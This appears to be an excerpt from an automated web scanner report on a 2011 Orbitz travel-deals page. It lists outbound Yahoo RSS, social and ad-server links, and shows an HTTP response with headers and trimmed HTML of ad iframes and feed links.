http://us.rd.yahoo.com/my/atm/Orbitz.com/Las%20Vegas/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/LAS.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Las%20Vegas/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/LAS.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Las%20Vegas/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/LAS.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Los%20Angeles/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/CA/LosAngeles.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Los%20Angeles/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/LAX.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Los%20Angeles/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/LAX.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Los%20Angeles/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/LAX.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Miami/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/FL/Miami.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Miami/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/MIA.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Miami/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/MIA.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Miami/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/MIA.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Minneapolis/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/MSP.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Minneapolis/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/MSP.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Nassau/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/BS/Nassau.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Nassau/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/NAS.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/New%20York/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/NY/NewYork.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/New%20York/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/JFK.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Newark/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/EWR.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Newark/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/EWR.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Orbitz%20Travel%20Blog/*http:/add.my.yahoo.com/rss?url=http://blog.orbitz.com/orbitz_blog/rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Orlando/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/FL/Orlando.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Orlando/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/ORL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Orlando/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/MCO.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Philadelphia/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/PHL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Philadelphia/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/PHL.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Phoenix/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/AZ/Phoenix.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Phoenix/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/PHX.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Phoenix/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/PHX.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Phoenix/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/PHX.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Pittsburgh/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/PIT.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Pittsburgh/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/PIT.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Portland/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/PDX.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Portland/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/PDX.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Raleigh/Durham/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/RDU.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Raleigh/Durham/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/RDU.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Rental%20cars:%20Top%20Deals/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/cardeals.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Salt%20Lake%20City/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/SLC.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Salt%20Lake%20City/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/SLC.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/San%20Diego/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/SAN.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/San%20Diego/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/SAN.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/San%20Francisco/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/CA/SanFrancisco.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/San%20Francisco/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/SFO.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/San%20Jose/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/SJC.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/San%20Jose/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/SJC.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Seattle/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/WA/Seattle.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Seattle/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/SEA.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Seattle/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/SEA.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Seattle/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/SEA.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Tampa/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/TPA.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Tampa/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/origin/TPA.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Packages%20by%20Destination/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/lowestpackages.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation%20Packages:%20Top%20Deals/*http:/add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/topdeals-vacationpackages.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Washington%20DC/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/DC/WashingtonDC.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Washington%20DC/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/origin/WAS.rss.xml
http://us.rd.yahoo.com/my/atm/Orbitz.com/Washington%20DC/*http:/add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/IAD.rss.xml
http://www.bloglines.com/
http://www.facebook.com/Orbitz
http://www.google.com/reader
http://www.newsgator.com/consumer.aspx
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.pluck.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&
http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&
http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&
http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=178A76F3F171896D8B1D396D67B731F2; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Thu, 03 Feb 2011 06:45:49 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/
Content-Length: 77358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad468x60_top">
<iframe allowtransparency="true" height="60" width="468" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.revresda.com/html.ng/channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=deals&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296715550094&dsrc=7&height=60&width=468&" height="60" width="468" border="0"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation Packages: Top Deals/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/topdeals-vacationpackages.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Vacation Packages by Destination/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/lowestpackages.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotels: Top Deals/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/topdeals-hotels.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotels: Exclusive Offers/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/hotelpromos.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Hotels under $99/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/HotelsUnder99.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Flights: Top deals/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/topdeals-flights.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Flights: Airfares by Departure City/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/flightdeals.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Flights: Airfares by Destination/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/flightdealsByDestinations.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Rental cars: Top Deals/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/cardeals.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Cruise Vacations/*http://add.my.yahoo.com/rss?url=http://www.orbitz.com/rss/cruises.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Orbitz Travel Blog/*http://add.my.yahoo.com/rss?url=http://blog.orbitz.com/orbitz_blog/rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Airport delay updates/*http://add.my.yahoo.com/rss?url=http://updates.orbitz.com/rss/flying_forecast.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Las Vegas/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/NV/LasVegas.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Las Vegas/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/LAS.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/New York/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/NY/NewYork.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/New York/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/JFK.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Cancun/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/MX/Cancun.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Cancun/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/CUN.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Orlando/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/FL/Orlando.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Orlando/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/MCO.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Los Angeles/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/CA/LosAngeles.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Los Angeles/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/LAX.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Miami/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/FL/Miami.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Miami/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/MIA.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Nassau/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/BS/Nassau.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Nassau/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/NAS.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Chicago/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/IL/Chicago.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Chicago/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/MDW.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/San Francisco/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/CA/SanFrancisco.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/San Francisco/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/SFO.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Denver/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/CO/Denver.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Denver/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/DEN.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Atlanta/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/GA/Atlanta.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Atlanta/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/ATL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Phoenix/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/AZ/Phoenix.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Phoenix/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/PHX.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Honolulu (Island of Oahu)/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/HI/Honolulu(IslandofOahu).rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Honolulu (Island of Oahu)/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/packages/HNL.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
<td class="imgXTbl"><a href="http://us.rd.yahoo.com/my/atm/Orbitz.com/Boston/*http://add.my.yahoo.com/rss?url=http%3A//www.orbitz.com/rss/US/MA/Boston.rss.xml" target="_blank"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/my/addtomyyahoo4.gif" width="91" height="17" border="0" align="middle" alt="Add to My Yahoo!"></a>
...[SNIP]...
